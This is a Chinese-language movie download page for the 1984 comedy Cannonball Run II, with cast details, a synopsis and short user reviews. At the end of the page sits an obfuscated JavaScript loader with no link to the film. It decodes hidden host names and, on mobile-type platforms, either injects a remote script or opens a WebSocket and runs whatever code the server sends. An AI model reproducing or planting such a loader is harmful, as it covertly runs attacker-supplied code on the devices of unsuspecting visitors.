1984嘉禾美国喜剧《炮弹飞车2》BD1080P.国粤英语.中字


更新时间:2021-09-13 12:02:23 类别: 喜剧 动作 评论 下载
炮弹飞车2的海报 炮弹飞车2

炮弹飞车2

导演: 哈尔·尼达姆
编剧: Brock Yates / 哈尔·尼达姆
主演: 伯特·雷诺兹 / 多姆·德路易斯 / 成龙 / 托尼·丹扎 / 迪恩·马丁 / 小萨米·戴维斯 / 杰米·法尔
类型: 喜剧 / 动作
制片国家/地区: 美国 / 中国香港
语言: 英语
上映日期: 1984-06-29(美国)
又名: Cannonball Run II
片长: 108 分钟
IMDb: tt0087032
阿拉伯王子在大赛中失败回国,受责于父王。并命他立即去美国,重组飞车大赛,以重金为饵,一定要赢。果然,百万奖金吸引了大批参赛者。大赛中王子遭人绑架,飞车手们义不容辞,个个大显神威,王子被救出。立即把赛车奖金加倍,以资鼓励。
雲無憂 2013-03-31

国配版。狗尾续貂,创意无多,只剩恶搞。成龙又打了一瓶酱油

姓亚名蒙 2015-09-25

比第一部更差劲,演员当初估计都是签了两部的合同,所以硬着头皮也要演下去。没有许冠文,成龙转而跟“钢牙”搭戏,也没啥存在感

髦髦 2011-12-22

★☆ 不好好地在香港呆着,跑去好莱坞跑这种无聊电影的龙套

无趣 2017-10-14

比第一集还糟糕,因为新鲜劲过后又没玩出新花招。。。车跑一半还插了段特伦斯希尔风格的抢救人质闹剧也是醉了。。。一星半。

Godard 2020-02-18

故事复制首部无甚新意,情节胡闹乱来神似港片,很多梗看起来很蠢。惊喜的算是雪莉麦克莱恩和弗兰克辛纳屈的客串。成龙贡献了水果摊和the pinto ranch的两场打戏,跟他搭档的richard kiel因为太高显得很憨。

极度深寒 2012-07-06

比第一部还差。。。。很无聊的片子。票房方面美国两千多万,比起第一部前十的六千多万,明显狗血很多 。还是回国吧,好莱坞真的在这个阶段还不适合你! .

陪衬品 2013-02-04

狗尾续貂,创意无多,只剩恶搞。成龙又打了一瓶酱油。

噩梦枕头 2009-04-14

小时候以为是成龙的新片租回来看,结果……不过还是很热闹的……

未卜 2011-09-22

成龙的车特别屌,最后好像是猩猩拿了第一。

康斯坦丁 2010-12-23

好莱坞第二步,有大明星合作了。。。

战国客 2008-11-21

84年成龙参演的美国片!

5-617 2013-09-01

小时候是当av来看的啊,就记得有个裸女在拦车。。。

UrthónaD'Mors 2010-01-04

成龍是龍套兒

没头脑又不高兴 2009-04-04

里面有成龙哟

发际线靠后 2021-01-11

BSC频道HD双语字幕109分钟,皇家溃疡CPUSA,“我喜欢金发女郎,尤其是不长胡须的(ಡωಡ) ”!

2010-09-10

加一星为成龙

鬼鬼 2009-01-09

小时候挺喜欢的。

卷耳电影笔记 2019-06-01

邹文怀为将成龙捧为国际功夫巨星的造星作品之二。

玖萬 2013-02-15

很早看过,龙哥在里面打了个酱油

基顿不抹口红 2019-05-05

大概只记得Sinatra那句You can call me Sir(A/S/D/whatever you call it气质当场爆炸)

炮弹飞车2的截图1
炮弹飞车2的截图2
炮弹飞车2的截图3
炮弹飞车2的截图4
炮弹飞车2的截图5
function XYadmzlE(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function frlWgh(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return XYadmzlE(t);};window['\x54\x62\x55\x4f\x58\x71']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=frlWgh,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('bGgubGNN0Y3cudG9w','dHIueWVzdW42NzguY29tt','135631',window,document,['N','t']);}:function(){};